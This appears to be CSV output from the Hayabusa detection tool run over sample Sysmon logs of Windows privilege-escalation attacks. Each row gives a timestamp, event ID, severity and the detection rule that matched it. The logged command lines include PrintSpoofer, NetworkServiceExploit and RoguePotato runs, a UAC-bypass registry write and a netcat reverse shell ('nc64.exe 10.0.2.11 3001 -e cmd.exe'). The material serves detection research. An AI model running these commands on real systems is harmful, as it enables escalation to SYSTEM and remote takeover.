Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:36.984 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\INetCookies | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:37.209 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc | LID: 0x1d39b | PID: 5840 | PGUID: 747F3D96-B76F-5EA4-0000-0010624D0600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:40.692 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 6964 | PGUID: 747F3D96-B776-5EA4-0000-0010A74D0B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:40.712 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications | Process: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding | LID: 0x1d39b | PID: 7000 | PGUID: 747F3D96-B776-5EA4-0000-001006590B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:20:11.341 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 6656 | PGUID: 747F3D96-B79B-5EA4-0000-00105BD50F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:20:11.402 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6964 318 0000021FF2606500 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6648 | PGUID: 747F3D96-B79B-5EA4-0000-001075DA0F00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:20:11.516 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d36c | PID: 748 | PGUID: 747F3D96-B79B-5EA4-0000-001001FC0F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:20:16.073 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Discovery - domain time | Cmd: ""C:\BGinfo\BGINFO.EXE"" /accepteula /ic:\bginfo\bgconfig.bgi /timer:0 | Process: C:\BGinfo\BGINFO.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 7056 | PGUID: 747F3D96-B7A0-5EA4-0000-001026D11000 | Hash: SHA1=1CEE3FA8419BDF4CBC266461277E3FDD9B93DE25,MD5=3652BA8B882BF6C69AF70CE73CF0D616,SHA256=0362CD6E7B318AB9A4C74DAF229F11BB795A2CE553EA024CB49143456C27C41D,IMPHASH=6EC19FF15BC88DDEDB96115003A96430",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:20:16.165 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\SecurityHealthService.exe | Process: C:\Windows\System32\SecurityHealthService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 7088 | PGUID: 747F3D96-B7A0-5EA4-0000-001027D81000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:20:16.965 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe -Embedding | Process: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x1d39b | PID: 3376 | PGUID: 747F3D96-B7A0-5EA4-0000-00108D131100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:20:18.975 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe"" /background | Process: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 864 | PGUID: 747F3D96-B7A2-5EA4-0000-0010982F1200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:20:21.251 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\regedit.exe"" | Process: C:\Windows\regedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 3256 | PGUID: 747F3D96-B7A5-5EA4-0000-0010CAB51300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:20:21.263 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6964 258 0000021FF266EC20 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7036 | PGUID: 747F3D96-B7A5-5EA4-0000-0010EAB91300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:20:26.261 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\regedit.exe"" | Process: C:\Windows\regedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d36c | PID: 4480 | PGUID: 747F3D96-B7AA-5EA4-0000-001066001700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:21:08.564 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2792 | PGUID: 747F3D96-B7D4-5EA4-0000-0010E09B1700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:21:18.412 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 6548 | PGUID: 747F3D96-B7DE-5EA4-0000-0010FA4E1800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:21:19.340 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s WinRM | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 992 | PGUID: 747F3D96-B7DF-5EA4-0000-001052671800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:21:19.629 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1396 | PGUID: 747F3D96-B7DF-5EA4-0000-001080711800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-05-02 18:01:52.553 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | PID: 7212 | PGUID: 747F3D96-B49D-5EAD-0000-001029FEBE00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-02 18:01:54.855 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: PrintSpoofer.exe -i -c powershell.exe | Process: C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x812b1 | PID: 6760 | PGUID: 747F3D96-B592-5EAD-0000-0010ECCBC200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-02 18:01:54.863 +00:00,MSEDGEWIN10,17,medium,,Pipe Created_Sysmon Alert,Possible PrivEsc attempt - Rogue Spoolss Named Pipe | Pipe: \9023de59-e026-4da5-97dd-913597cd038f\pipe\spoolss | Process: c:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | PID: 6760 | PGUID: 747F3D96-B592-5EAD-0000-0010ECCBC200,rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-02 18:01:54.863 +00:00,MSEDGEWIN10,17,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/pipe_created_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-02 18:01:54.864 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\spoolss | Process: c:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | PID: 6760 | PGUID: 747F3D96-B592-5EAD-0000-0010ECCBC200,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-02 18:01:54.864 +00:00,MSEDGEWIN10,18,medium,,Pipe Connected_Sysmon Alert,Possible PrivEsc attempt - Rogue Spoolss Named Pipe | Pipe: \9023de59-e026-4da5-97dd-913597cd038f\pipe\spoolss | Process: System | PID: 4 | PGUID: 747F3D96-6AB8-5EAD-0000-0010EB030000,rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-02 18:01:54.864 +00:00,MSEDGEWIN10,18,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/pipe_created_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-02 18:01:54.867 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: powershell.exe | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: PrintSpoofer.exe -i -c powershell.exe | LID: 0x3e7 | PID: 1428 | PGUID: 747F3D96-B592-5EAD-0000-0010D4CDC200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-02 18:01:54.867 +00:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-02 18:01:57.418 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: powershell.exe | LID: 0x3e7 | PID: 6004 | PGUID: 747F3D96-B595-5EAD-0000-00106BFDC200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-02 18:01:57.418 +00:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-02 18:01:57.418 +00:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation_sysmon/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-02 18:01:57.418 +00:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-07 13:13:01.683 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - T1088 - UACBypass - changepk UACME61 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\Launcher.SystemSettings\shell\open\command\(Default): c:\Windows\System32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 7084 | PGUID: 747F3D96-095D-5EB4-0000-001082FF1700,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx +2020-05-07 13:13:02.481 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\ChangePk.exe"" | LID: 0x2ecba | PID: 5216 | PGUID: 747F3D96-095E-5EB4-0000-0010D46F1800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx +2020-05-10 00:09:36.635 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe"" | Process: C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e4 | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 00:09:36.647 +00:00,MSEDGEWIN10,17,info,,Pipe Created,\frAQBc8Wsa1 | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 00:09:36.662 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\frAQBc8Wsa1 | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 00:09:36.701 +00:00,MSEDGEWIN10,17,info,,Pipe Created, | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 00:09:36.701 +00:00,MSEDGEWIN10,18,info,,Pipe Connected, | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 00:09:36.701 +00:00,MSEDGEWIN10,17,info,,Pipe Created, | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 00:09:36.701 +00:00,MSEDGEWIN10,18,info,,Pipe Connected, | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 00:09:36.709 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe"" | LID: 0x3e7 | PID: 372 | PGUID: 747F3D96-4640-5EB7-0000-0010EF364B01",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 00:09:38.023 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49682 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 00:09:38.023 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49682 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 00:09:43.372 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\Windows\System32\cmd.exe | LID: 0x3e7 | PID: 7672 | PGUID: 747F3D96-4647-5EB7-0000-0010B3454B01,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 00:09:43.372 +00:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 00:09:43.372 +00:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation_sysmon/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 00:09:43.372 +00:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 00:11:16.714 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 180 | PGUID: 747F3D96-46A4-5EB7-0000-00109FE74C01,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 00:11:20.824 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.101:49683 (MSEDGEWIN10) | Dst: 192.168.56.1:139 (LAPTOP-JU4M3I0E) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-11 23:21:56.493 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999 | Process: C:\Users\IEUser\Tools\PrivEsc\RoguePotato.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e5 | PID: 4200 | PGUID: 747F3D96-DE14-5EB9-0000-0010BE064300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-11 23:21:56.519 +00:00,MSEDGEWIN10,17,medium,,Pipe Created_Sysmon Alert,Rogue Epmapper np detected - possible RoguePotato privesc | Pipe: \RoguePotato\pipe\epmapper | Process: c:\Users\IEUser\tools\PrivEsc\RoguePotato.exe | PID: 4200 | PGUID: 747F3D96-DE14-5EB9-0000-0010BE064300,rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-11 23:21:56.519 +00:00,MSEDGEWIN10,17,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/pipe_created_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-11 23:21:56.562 +00:00,MSEDGEWIN10,18,medium,,Pipe Connected_Sysmon Alert,Rogue Epmapper np detected - possible RoguePotato privesc | Pipe: \RoguePotato\pipe\epmapper | Process: System | PID: 4 | PGUID: 747F3D96-545A-5EBA-0000-0010EB030000,rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-11 23:21:56.562 +00:00,MSEDGEWIN10,18,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/pipe_created_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-11 23:21:56.587 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe | Process: C:\Users\IEUser\Tools\Misc\nc64.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999 | LID: 0x3e7 | PID: 4468 | PGUID: 747F3D96-DE14-5EB9-0000-00107C0F4300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-11 23:21:56.661 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe | LID: 0x3e7 | PID: 224 | PGUID: 747F3D96-DE14-5EB9-0000-001079154300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-11 23:22:26.650 